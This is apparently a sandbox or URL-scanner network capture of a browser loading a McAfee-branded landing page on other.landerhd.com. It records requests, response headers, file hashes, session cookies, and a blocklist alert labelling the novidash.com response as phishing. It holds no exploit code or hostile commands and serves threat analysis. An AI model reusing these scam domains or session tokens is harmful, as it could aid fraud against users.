Sha256: b494f22ff0e7d3f34e58eed4232718aec04e61857777fff1bee495f488a52084
                                        
                                            GET /landingpages/mcafee/360.png HTTP/1.1 
Host: other.landerhd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 38110
last-modified: Wed, 31 Aug 2022 12:57:28 GMT
etag: "630f5ab8-94de"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 125 x 168, 8-bit/color RGBA, non-interlaced\012- data
Size:   38110
Md5:    15f432f9006e7256a9452bdd27835619
Sha1:   7042133d844e198542a7cc1fadcc513059130fe6
Sha256: 010ba660952072e4c859f26dd1f74bc21cc2d7bdbf7c37b90d9e3ed279ad500f
                                        
                                            GET /landingpages/mcafee/logo.png HTTP/1.1 
Host: other.landerhd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 30211
last-modified: Wed, 31 Aug 2022 12:57:28 GMT
etag: "630f5ab8-7603"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 1280 x 257, 8-bit/color RGBA, non-interlaced\012- data
Size:   30211
Md5:    26740ccd6ca2d5d3542f4b0d540bd30c
Sha1:   13c7ccbb771765399a7aeb351a9c8d79e668c480
Sha256: 9db2bed7f1778805e72f7f079f0b8789eaf039e3d9124145d2e88dab53e22ae2
                                        
                                            POST /ca/gsatlasr3dvtlsca2022q1 HTTP/1.1 
Host: ocsp.globalsign.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.21.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sat, 03 Sep 2022 02:55:15 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Etag: "F44941A94EFB69688F9D98AA87B5FC757AE6BAC0"
Expires: Sat, 03 Sep 2022 14:00:00 GMT
Last-Modified: Sat, 03 Sep 2022 02:00:00 UTC
Cache-Control: s-maxage=3600, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Age: 265
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 744b34974d260b69-OSL


--- Additional Info ---
Magic:  data
Size:   1462
Md5:    1e44fe5b89483e5daff984f8c320bfdd
Sha1:   4ed24dcc9f1a080d7493ae1aec94d301c0efa704
Sha256: 466b103965e99dbbac6220f0033cfa949775654842dbf9dc4a107a6db1ba5a1b
                                        
                                            GET /releases/v5.7.2/webfonts/fa-solid-900.woff2 HTTP/1.1 
Host: use.fontawesome.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://use.fontawesome.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.67.169.247
HTTP/2 200 OK
content-type: font/woff2
                                        
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 74348
x-amz-id-2: 3/jdcpXI5+xJK7nwn8d2HdkJXJ8r1+io6huMQ4QXh7pg2id0g0n3j3YsvIgin01B5xYbhPbKRn0=
x-amz-request-id: JK0848QW7EBGRV95
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
last-modified: Wed, 30 Jun 2021 15:46:18 GMT
etag: "462806316fea535a6a57651bc2b000b0"
cache-control: max-age=31556926
cf-cache-status: HIT
age: 24685
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gh58UNA5Y7xOs1dFBeNXukZe6vedhnisNyI9HgTi47MEcPVZaHGxotL7zcjievHxHGPJdJsJ2NACibliMycHWj0W0g34RpcQYSuqxmcAIC%2BmU3fruEfbLrHUEgsQV6ELSnNL48cG"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 744b3497cbc71bfa-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 74348, version 329.31064\012- data
Size:   74348
Md5:    462806316fea535a6a57651bc2b000b0
Sha1:   80644191098f863f25be27841c0d92c452cf2327
Sha256: 4f9ee3d8f6e621642979e6a8f7e75c57cb9da34918cc08a38abfe178dbae1dd2
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4295
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:43:40 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /landingpages/mcafee/bg.jpg HTTP/1.1 
Host: other.landerhd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 129948
last-modified: Wed, 31 Aug 2022 12:57:35 GMT
etag: "630f5abf-1fb9c"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1800x613, components 3\012- data
Size:   129948
Md5:    444f46588f202bb38dceb8191f606f3e
Sha1:   f4eb55005df6be8068bb9c78d7fc0cd70651a1dc
Sha256: 86102483f8cb9a2d5bd4771914f960e1ea0bf6b1866aa1c2b86f75a1018b94ce
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4834
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:34:41 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5550
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:22:45 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /gtm.js?id=GTM-TRL5HN2 HTTP/1.1 
Host: www.googletagmanager.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.72
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
content-encoding: br
vary: Accept-Encoding
date: Sat, 03 Sep 2022 02:55:15 GMT
expires: Sat, 03 Sep 2022 02:55:15 GMT
cache-control: private, max-age=900
last-modified: Sat, 03 Sep 2022 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
server: Google Tag Manager
content-length: 46500
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (3238)
Size:   46500
Md5:    fed66092a73699790c5a5c0ab8c61742
Sha1:   acc29b29757e94ae36f8ab603503afa7e9717819
Sha256: 6ee6f45b0a94e19952a0de0b8aa60c18e5697d359f913b30b6ac14bfac49f2e2
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5550
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:22:45 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: jU7sEEBQFRShFzKuGuA+HA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         34.214.110.180
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 12hLmOucVz5ytSREeOWeJCOxQJ0=

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         143.204.42.165
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:15:14 GMT
Server: ECS (nyb/1D31)
X-Cache: Miss from cloudfront
Via: 1.1 b9f0050ca4d212d7c855e005be54b1ac.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: KBEzrHF4DvO4WScfkciH_BWwRDFuZRjUIoyx34el9Tg_RXp0h7ZcKg==
Age: 6001

                                        
                                            POST /api/v1/detect?token=HtazsqGCe7nkVaIHchA&version=0.1.20 HTTP/1.1 
Host: botd.fpapi.io
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://other.landerhd.com/
Content-Type: text/plain
Origin: https://other.landerhd.com
Content-Length: 21686
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         18.215.75.60
HTTP/2 200 OK
content-type: application/octet-stream
                                        
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 313
server: nginx
access-control-allow-credentials: true
access-control-allow-headers: Accept, Content-Type, Origin, Content-Length, Accept-Encoding, Authorization, Auth-Subscriptions, Botd-Password
access-control-allow-methods: POST, GET, OPTIONS
access-control-allow-origin: https://other.landerhd.com
x-amzn-trace-id: Root=1-6312c213-5c774eac55bec6ef5307dcf8
X-Firefox-Spdy: h2

                                        
                                            GET /landingpages/mcafee/favicon.ico HTTP/1.1 
Host: other.landerhd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: image/x-icon
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 1150
last-modified: Wed, 31 Aug 2022 12:57:35 GMT
etag: "630f5abf-47e"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel\012- data
Size:   1150
Md5:    ff7441c3264d89023f376e5319dad793
Sha1:   1f0be835d947eb2de35d945ea5b9b92578a8cbd7
Sha256: 93130759a18703dcad5862bc2fd2973edf9ab7e48ba2c0b4cd4fcfaf832df223
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4446
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:41:09 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /smartlink-css/6312c212994913464d155879?fingerprintid=9e4947f35751465411fd1a4f5c358c78 HTTP/1.1 
Host: novidash.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Content-Length: 22284
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6IjAxdW9ZaTNTSDhLNmtsaGVzOXE2TUE9PSIsInZhbHVlIjoieFdYREhzU2tNQkpBK1NvM3JJTi9Oc1ZjamFBc28vSHhTc251YVU3c3A0Vy9yVWFseGduQUVEQ21HdmRDbGxJc3J6ekNWYTI1Q00rSWtnR1NyM1F0Vk5pQVA5V1N2SzZMTUpiYnduTHJURmJNZzZta3lpZkFlRWhuNG5neUlOUEYiLCJtYWMiOiJiZDg5ZWUwMzkzNDFjY2JjZjdiYzg1Yzk3ZDBjNDVhZWRkNjUwYmNjYTUwMWFjMTczMDRiMGQzMDBiODI0NjZmIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:15 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IjlVL3ZJQzRSeEVSTlFsbGZuSkRSckE9PSIsInZhbHVlIjoibHFQRXlZY2h3UGpHY3ZqSnJuRUtYeXkwRzAvUW5oaWFPd1U1UitFQ2htRmMyckpYWTBWaGZLOW5aQTFnQ1JSYmlJTndPMHJjWUpodlpTZ20wcmhrUXZuaEdGRExXbmhMcTg3cW1DTXd6bWtXMFZ1Ny9BMmFMRzVycG51ZmVTWjUiLCJtYWMiOiJjYjE3OTRkZjUwMWRiZDg1Nzk0MjEzNDFjNWVkYzRhNTUzNTc4ZWMyYzE4ODg0OWYwYzNjNjU3OTZhZjVmNGVkIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:15 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  gzip compressed data, max compression\012- data
Size:   20006
Md5:    56f5d7f608e25d64207135f045f988cb
Sha1:   901eb59372ae330ae85e1384da93479b21ae1082
Sha256: 1910daea79e5a9d04829a91e432dfa56f45a80a3e14a8cf667fec73af9fd3d29

Alerts:
  Blocklists:
    - fortinet: Phishing
  File Analyzers:
    - virustotal: 0/56
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Ffavicon.ico&uilel=3&hl=en&service=youtube HTTP/1.1 
Host: accounts.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.237
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
                                        
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Sat, 03 Sep 2022 02:55:15 GMT
location: https://accounts.google.com/v3/signin/identifier?dsh=S-1894852716%3A1662173715852221&continue=https%3A%2F%2Fwww.youtube.com%2Ffavicon.ico&hl=en&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQN2RmW9rJH5YUC-6E5LSVGZanyKywSleyyjxMdPTvnEgvYFigEtMJ6ab9qGOPpW7Ia20OUabu7L6w
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: script-src 'nonce-cDX527YkZhdrzizJqkCnDA' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport, require-trusted-types-for 'script';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 394
server: GSE
